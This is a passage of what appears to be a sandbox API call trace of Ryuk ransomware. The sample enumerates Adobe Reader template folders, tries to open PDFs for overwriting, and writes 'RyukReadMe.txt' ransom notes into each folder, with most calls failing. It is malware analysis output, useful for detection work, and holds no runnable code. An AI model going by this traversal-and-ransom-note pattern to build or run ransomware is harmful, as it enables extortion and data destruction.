hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.328] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.329] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.329] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hun\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.329] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.329] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.329] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.329] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.329] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hun\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.329] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.329] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.330] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.330] SetLastError (dwErrCode=0x0) [0138.330] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hun\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.330] GetLastError () returned 0x5 [0138.330] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.330] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.330] SetLastError (dwErrCode=0x0) [0138.330] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.330] GetLastError () returned 0x5 [0138.330] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.330] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.330] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.330] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.330] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.330] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.331] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.331] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ita\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.331] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.331] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.332] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.332] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.332] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ita\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.332] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.332] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.332] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.332] SetLastError (dwErrCode=0x0) [0138.332] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ita\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.332] GetLastError () returned 0x5 [0138.332] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.332] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.332] SetLastError (dwErrCode=0x0) [0138.333] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.333] GetLastError () returned 0x5 [0138.333] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.333] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.333] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.333] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.333] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.333] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.333] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.333] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\jpn\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.333] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.333] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.333] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.334] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.334] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\jpn\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.334] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.334] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.335] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.335] SetLastError (dwErrCode=0x0) [0138.335] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\jpn\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.335] GetLastError () returned 0x5 [0138.335] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.335] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.335] SetLastError (dwErrCode=0x0) [0138.335] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.335] GetLastError () returned 0x5 [0138.335] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.335] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.335] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.335] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.335] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.335] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.335] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.336] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\kor\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.336] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.336] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.336] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.336] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.336] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\kor\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.336] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.336] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.336] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.336] SetLastError (dwErrCode=0x0) [0138.336] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\kor\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.337] GetLastError () returned 0x5 [0138.337] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.337] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.337] SetLastError (dwErrCode=0x0) [0138.337] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.337] GetLastError () returned 0x5 [0138.337] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.337] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.337] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.338] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.338] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.338] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.338] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.338] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nld\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.338] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.338] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.338] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.338] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.339] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nld\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.339] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.339] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.339] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.339] SetLastError (dwErrCode=0x0) [0138.339] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nld\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.339] GetLastError () returned 0x5 [0138.339] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.339] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.339] SetLastError (dwErrCode=0x0) [0138.339] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.339] GetLastError () returned 0x5 [0138.339] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.339] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.339] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.340] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.340] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.340] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.340] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.341] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nor\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.341] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.341] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.341] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.341] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.341] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nor\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.341] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.342] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.342] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.342] SetLastError (dwErrCode=0x0) [0138.342] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nor\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.342] GetLastError () returned 0x5 [0138.342] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.342] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.342] SetLastError (dwErrCode=0x0) [0138.342] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.342] GetLastError () returned 0x5 [0138.342] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.342] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.342] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.343] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.343] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.343] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.343] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.343] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\pol\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.343] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.343] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.344] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.344] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.344] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\pol\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.344] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.344] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.344] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.344] SetLastError (dwErrCode=0x0) [0138.344] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\pol\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.344] GetLastError () returned 0x5 [0138.344] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.344] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.344] SetLastError (dwErrCode=0x0) [0138.344] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.345] GetLastError () returned 0x5 [0138.345] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.345] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.345] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.345] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.345] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.345] VirtualAlloc 